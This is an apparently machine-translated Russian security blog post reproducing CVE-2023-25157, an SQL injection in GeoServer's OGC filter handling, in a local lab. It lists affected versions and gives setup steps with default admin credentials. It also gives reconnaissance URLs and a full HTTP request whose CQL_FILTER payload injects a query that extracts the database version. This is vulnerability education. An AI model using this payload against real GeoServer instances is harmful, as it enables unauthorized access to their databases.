CVE-2023-25157: уязвимость внедрения SQL-кода в фильтр GeoServer OGC.
CVE-2023-25157: уязвимость внедрения SQL-кода в фильтр GeoServer OGC.

Подпишитесь на нас ❤️, добавьте звездочку 🌟 и учитесь безопасности вместе! Автор: lyc@Timeline Sec Количество слов в этой статье: 1296. Время чтения: 2~4 минуты. Заявление: Это только для ознакомления, пожалуйста, не используйте его в незаконных целях, в противном случае вы будете нести ответственность за последствия.

0x01 Введение

GeoServer — это J2EE-реализация спецификации веб-сервера OpenGIS. GeoServer можно использовать для простой публикации картографических данных и предоставления пользователям возможности обновлять, удалять и вставлять данные объектов. GeoServer может быстро и легко обмениваться пространственной географической информацией между пользователями.

0x02 Обзор уязвимостей

Номер уязвимости: CVE-2023-25157. В версиях до 2.22.1 и 2.21.4 была обнаружена проблема внедрения SQL в выражениях фильтров и функций, определенных стандартом Открытого геопространственного консорциума (OGC), которая могла позволить злоумышленнику, не прошедшему проверку подлинности, использовать уязвимость для выполнения SQL-инъекции и выполнения вредоносных программ. код.

0x03 Затронутые версии

geoserver<2.18.7 2.19.0<=geoserver<2.19.7 2.20.0<=geoserver<2.20.7 2.21.0<=geoserver<2.21.4 2.22.0<=geoserver<2.22.2

0x04 Настройка среды

Среда настройки GeoServer имеет множество опций. Загрузите версию для Windows здесь.

Ссылка для скачивания: https://sourceforge.net/projects/geoserver/files/GeoServer/2.22.0/GeoServer-2.22.0-winsetup.exe/download

После скачивания приступаем к установке

Перед установкой этой службы необходимо настроить среду Java, иначе следующий шаг установки среды будет невозможен.

Пароль учетной записи администратора службы следующий. Вы можете использовать пароль по умолчанию или изменить его самостоятельно.

По умолчанию здесь установлен порт 8080, который может конфликтовать. Вы можете изменить конфигурацию самостоятельно. Здесь установлен порт 9999.

После того как все установлено,GeoServerПуть установки по умолчанию следующий::C:\Program Files\GeoServer\bin,Нажмитеstartup.bat,запустить скрипт,После запуска скрипта,Не закрывайте cmd. просить.

Посетите следующий URL-адрес:http://localhost:9999/geoserver/web/,Здесь указан порт 9999, поскольку в конфигурации выше он был 9999.,когда на самом деле посещаешь,Вам необходимо получить доступ в соответствии с вашим собственным портом. И введите указанный выше пароль учетной записи: admin/geoserver.,Войдите в Геосервер

Войти успешно

0x05 Повторение уязвимости

Выполнение SQL-инъекции уязвимости До,Во-первых, вам необходимо получить информацию о списке географических слоев.,Эта информация является обязательным параметром в полезных данных внедрения SQL.

Доступ по следующему пути для получения информации о списке географических слоев.

Язык кода:javascript
копировать
http://192.168.254.170:9999/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

<Name>информация на этикетках,Это список географических слоев。Выбирайте здесьne:populated_placesВ качестве информации о списке географических слоев

Затем перейдите по следующему пути, чтобы получить имя атрибута слоя.

Язык кода:javascript
копировать
http://192.168.254.170:9999/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=ne:populated_places&maxFeatures=1&outputFormat=json

Окончательная полезная нагрузка выглядит следующим образом:

Язык кода:javascript
копировать
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
Host: 192.168.254.170:9999
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1p6q6kkghu4bg1x04chtdvm369
Connection: close

Запрос информации о версии базы данных

0x06 Как это исправить

Последняя версия была официально выпущена, и вы можете загрузить и обновить ее до последней версии.

boy illustration
Учебное пособие по Jetpack Compose для начинающих, базовые элементы управления и макет
boy illustration
Код js веб-страницы, фон частицы, код спецэффектов
boy illustration
【новый! Суперподробное】Полное руководство по свойствам компонентов Figma.
boy illustration
🎉Обязательно к прочтению новичкам: полное руководство по написанию мини-программ WeChat с использованием программного обеспечения Cursor.
boy illustration
[Забавный проект Docker] VoceChat — еще одно приложение для мгновенного чата (IM)! Может быть встроен в любую веб-страницу!
boy illustration
Как реализовать переход по странице в HTML (html переходит на указанную страницу)
boy illustration
Как решить проблему зависания и низкой скорости при установке зависимостей с помощью npm. Существуют ли доступные источники npm, которые могут решить эту проблему?
boy illustration
Серия From Zero to Fun: Uni-App WeChat Payment Practice WeChat авторизует вход в систему и украшает страницу заказа, создает интерфейс заказа и инициирует запрос заказа
boy illustration
Серия uni-app: uni.navigateЧтобы передать скачок значения
boy illustration
Апплет WeChat настраивает верхнюю панель навигации и адаптируется к различным моделям.
boy illustration
JS-время конвертации
boy illustration
Обеспечьте бесперебойную работу ChromeDriver 125: советы по решению проблемы chromedriver.exe не найдены
boy illustration
Поле комментария, щелчок мышью, специальные эффекты, js-код
boy illustration
Объект массива перемещения объекта JS
boy illustration
Как открыть разрешение на позиционирование апплета WeChat_Как использовать WeChat для определения местонахождения друзей
boy illustration
Я даю вам два набора из 18 простых в использовании фонов холста Power BI, так что вам больше не придется возиться с цветами!
boy illustration
Получить текущее время в js_Как динамически отображать дату и время в js
boy illustration
Вам необходимо изучить сочетания клавиш vsCode для форматирования и организации кода, чтобы вам больше не приходилось настраивать формат вручную.
boy illustration
У ChatGPT большое обновление. Всего за 45 минут пресс-конференция показывает, что OpenAI сделал еще один шаг вперед.
boy illustration
Copilot облачной разработки — упрощение разработки
boy illustration
Микросборка xChatGPT с низким кодом, создание апплета чат-бота с искусственным интеллектом за пять шагов
boy illustration
CUDA Out of Memory: идеальное решение проблемы нехватки памяти CUDA
boy illustration
Анализ кластеризации отдельных ячеек, который должен освоить каждый&MarkerгенетическийВизуализация
boy illustration
vLLM: мощный инструмент для ускорения вывода ИИ
boy illustration
CodeGeeX: мощный инструмент генерации кода искусственного интеллекта, который можно использовать бесплатно в дополнение к второму пилоту.
boy illustration
Машинное обучение Реальный бой LightGBM + настройка параметров случайного поиска: точность 96,67%
boy illustration
Бесшовная интеграция, мгновенный интеллект [1]: платформа больших моделей Dify-LLM, интеграция без кодирования и встраивание в сторонние системы, более 42 тысяч звезд, чтобы стать свидетелями эксклюзивных интеллектуальных решений.
boy illustration
LM Studio для создания локальных больших моделей
boy illustration
Как определить количество слоев и нейронов скрытых слоев нейронной сети?
boy illustration
[Отслеживание целей] Подробное объяснение ByteTrack и детали кода